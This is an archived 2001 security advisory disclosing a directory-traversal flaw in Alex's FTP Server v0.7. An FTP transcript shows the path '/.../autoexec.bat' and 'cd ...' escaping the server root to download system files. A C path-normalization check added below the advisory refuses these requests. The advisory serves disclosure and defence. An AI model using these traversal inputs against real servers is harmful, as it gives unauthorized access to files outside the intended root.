From: joetesta@HUSHMAIL.COM
Date: Sat Apr 28 2001 - 18:52:34 CDT

    ----- Begin Hush Signed Message from joetesta@hushmail.com -----

    Vulnerabilities in Alex's FTP Server

        Overview

    Alex's Ftp Server v0.7 is an ftp server available from http://www.alex.feedback.net.
    Vulnerabilities exist which allow a user to break out of the ftp root.

        Details

    The following is an illustration of the problem. An ftp root of
    'c:\directory\directory' was used:

    Connected to xxxxxxxxxx.rh.rit.edu.
    220 xxxxxxxxxx FTP version 0.7 ready at Fri Apr 20 23:17:32 2001
    User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Enter PASS command
    Password:
    230 Logged in
    ftp> get /.../autoexec.bat
    200 Port command okay
    150 Opening data connection for retr "/.../autoexec.bat"
    226 Transfer complete
    ftp: 411 bytes received in 0.00Seconds 411000.00Kbytes/sec.
    ftp> cd ...
    257 "/.../" is current directory
    ftp> get command.com
    200 Port command okay
    150 Opening data connection for retr "/.../command.com"
    226 Transfer complete
    ftp: 85 bytes received in 0.00Seconds 85000.00Kbytes/sec.
    ftp>

        Solution

    No quick fix is possible.

        Vendor Status

    Alex Linde was contacted via <alex.linde@magic4.com> on
    Friday, April 20, 2001. No reply was received.

        - Joe Testa

    e-mail: joetesta@hushmail.com
    web page: http://hogs.rit.edu/~joet
    AIM: LordSpankatron

    This message has been signed with a Hush Digital Signature.
    To verify the signature, please go to www.hush.com/tools
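
Added example, not part of the original advisory and not the vendor's code: a server-side check that would refuse the requests shown in the transcript. On Windows 9x a path component of three dots resolves two levels up, which is how `/.../autoexec.bat` escapes a root of `c:\directory\directory`. The names `resolve_virtual` and `MAX_DEPTH` are hypothetical, and refusing every component that ends in a dot or space is a policy assumption, made because Win32 strips those characters when it opens a file.

```c
#include <stdio.h>
#include <string.h>

#define MAX_DEPTH 64   /* hypothetical limit chosen for this example */

/* Resolve req (absolute, or relative to the virtual directory cwd) into a
 * normalized virtual path in out. Returns 0 on success, -1 if the request
 * must be refused. The caller appends the result to the real FTP root. */
int resolve_virtual(const char *cwd, const char *req, char *out, size_t outlen) {
    const char *parts[MAX_DEPTH];
    size_t lens[MAX_DEPTH], used = 1;
    int depth = 0;
    const char *srcs[2] = { (req[0] == '/' || req[0] == '\\') ? "" : cwd, req };
    for (int k = 0; k < 2; k++) {
        for (const char *p = srcs[k]; *p; ) {
            size_t n = strcspn(p, "/\\");           /* accept both separators */
            if (n == 0) { p++; continue; }
            if (memchr(p, ':', n)) return -1;       /* drive letter or stream */
            if (n == 2 && p[0] == '.' && p[1] == '.') {
                if (depth-- == 0) return -1;        /* ".." above the root */
            } else if (p[n - 1] == '.' || p[n - 1] == ' ') {
                if (n > 1 || p[0] == ' ') return -1; /* "...", "x.", ".. " */
            } else {                                /* ordinary name: push */
                if (depth == MAX_DEPTH) return -1;
                parts[depth] = p; lens[depth++] = n;
            }
            p += n;                                 /* a lone "." is a no-op */
        }
    }
    if (outlen < 2) return -1;
    strcpy(out, "/");
    for (int i = 0; i < depth; i++) {
        if (used + lens[i] + 2 > outlen) return -1;
        if (i > 0) out[used++] = '/';
        memcpy(out + used, parts[i], lens[i]);
        out[used += lens[i]] = '\0';
    }
    return 0;
}

int main(void) {
    char buf[260];   /* request strings are constructed from the transcript */
    printf("%d\n", resolve_virtual("/", "/.../autoexec.bat", buf, sizeof buf));
    printf("%d %s\n", resolve_virtual("/pub", "../pub/./a.txt", buf, sizeof buf), buf);
    return 0;
}
```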